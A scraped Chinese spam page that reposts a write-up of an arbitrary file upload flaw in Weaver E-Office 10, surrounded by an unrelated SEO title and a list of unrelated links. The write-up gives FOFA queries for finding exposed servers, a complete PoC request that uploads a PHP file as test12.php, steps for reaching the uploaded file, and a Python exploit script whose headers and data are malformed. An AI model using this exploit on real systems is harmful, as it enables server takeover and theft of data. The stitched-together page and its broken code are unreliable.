当前位置: 首页 > news >正文

网站静态路径wordpress主题仪表盘

news 2025/12/27 3:18:58
网站静态路径,wordpress主题仪表盘,修改网站首页排序,seo推广内容声明 本文仅用于技术交流#xff0c;请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;文章作者不为此承担任何责任。 漏洞简介 泛微e-ofice是一款标准化的协同0A办公软件#xff0c;泛微 …声明 本文仅用于技术交流请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责文章作者不为此承担任何责任。 漏洞简介 泛微e-ofice是一款标准化的协同0A办公软件泛微 E-ofice 10 0ficeServer 存在任意文件上传漏洞攻击者可以上传任意文件获取webshell在服务器上执行任意命令、读取敏感信息等 FOFA语法 bodyeoffice10 bodyeoffice_loading_tip Poc POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 395 Content-Type: multipart/form-data; boundary----WebKitFormBoundaryJjb5ZAJOOXO7fwjs Accept-Encoding: gzip, deflate Connection: close------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; nameFileData; filename1.jpg Content-Type: image/jpeg?php phpinfo();unlink(__FILE__);? ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; nameFormData{USERNAME:,RECORDID:undefined,OPTION:SAVEFILE,FILENAME:test12.php} ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--漏洞复现 1、访问漏洞环境 2、老形式burp重放一下 出现下面的状态码和响应包说明漏洞可能存在 3、然后访问如下的URL链接,即可查看上传文件内容 http://xxx.xxx.xxx.xxx/eoffice10/server/public/iWebOffice2015/Document/test12.php poc(python脚本 import re import requestsurlhttp://xxxxxxxxxx/eoffice10/server/public/iWebOffice2015/OfficeServer.php headers {User - Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0,Content - Length:393,Content - Type: multipart / form - data;,boundary ----WebKitFormBoundaryJjb5ZAJOOXO7fwjsAccept - Encoding: gzip, deflate,Connection:close }data {------WebKitFormBoundaryJjb5ZAJOOXO7fwjsContent-Disposition: form-data; nameFileData; filename1.jpg,Content-Type: image/jpeg?php phpinfo();unlink(__FILE__);?------WebKitFormBoundaryJjb5ZAJOOXO7fwjs,Content-Disposition: form-data; nameFormData{USERNAME:,RECORDID:undefined,OPTION:SAVEFILE,FILENAME:test12.php}------WebKitFormBoundaryJjb5ZAJOOXO7fwjs-- }response requests.post(url, headersheaders, datadata)print(Status Code:, response.status_code)if response.status_code 200:print(存在泛微OA E-Office V10 OfficeServer 任意文件上传漏洞) 修复建议 去官网打补丁
http://www.dnsts.com.cn/news/249410.html

相关文章:

  • 深圳规划建设局网站xiu wordpress
  • 网站制作软件下载安装wordpress整合ck
  • 做新闻门户网站需要什么软件工程师主要做什么
  • 建设网站 软件推荐网站顶部图片素材
  • 怎么看一个网站是不是仿站网页模板免费下载源代码
  • 中国建设银行章丘支行网站intellij 网站开发
  • 制作一个网站的全过程音乐网站开发与需求
  • 网站空间的地址网站建设源码导入
  • 网站平台需要做无形资产吗 怎么做wordpress毛玻璃主题
  • 国家企业信息查询网站wordpress 小米主题制作
  • 郑州网站制作公司名单公司网站的宣传栏怎么做
  • 地方网站 o2o网络推广网站推广
  • 免费站推广网站链接县区网站服务器机房建设
  • 珠海做企业网站多少钱成都网站建设 小兵cms
  • 国内永久在线免费建站数据中心网络架构
  • 网站建设 网页设计专业商城网站设计制作
  • wordpress文章页名称seo短视频网页入口引流网站推荐
  • 网站建设高端网站移动转换
  • 金华建站方案网业拼音怎么写
  • 网站如何加入百度联盟怎么做扒代码网站
  • 电费由谁承担陕西seo经理
  • 网站有哪几种类型免费注册网站流程
  • 广州网站设计公司新闻邯郸房产网站
  • 网站字体特效做ppt的网站叫什么名字
  • 自己做视频网站公司介绍ppt
  • wordpress 网站图标电子商务网站的定义
  • 免费的个人简历模板 简约重庆网站推广优化软件业务
  • 彩票网站建设与推广哈尔滨网站开发公司
  • 同一个阿里云可以做两个网站网站建设与规划专业
  • 做建网站的工作一年赚几百万大连模板开发建站